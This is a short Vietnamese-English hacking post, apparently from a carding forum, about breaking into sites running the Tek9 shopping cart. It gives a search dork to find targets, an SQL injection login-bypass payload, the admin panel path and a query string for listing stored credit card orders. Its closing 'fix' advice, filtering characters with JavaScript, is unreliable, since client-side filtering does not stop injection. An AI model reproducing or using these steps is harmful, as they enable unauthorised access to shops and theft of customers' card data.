Hack shop Cart Tesk9
trang này đã được đọc lầnSoft
: Tek9 Shopping Cart
Google Search : "/tek9.asp"
Bug : SQL Injection .
Homepage : http://line9.com
Tek9 is a shopping card which is used for many big company.
It has store all credit card information , or others important customer
information.
The Login form or the Admin Cp can by pass : ' or ''='
Admin CP :
www.shoppingcart.com/intranet/tek9.asp
và thêm đọan này : ?pg=orders&mode=search vào cuối link trên addrr để tìm list
cc.
Fix : Now , please
upgrade to new sql server , using java script to
break all : ',;, ....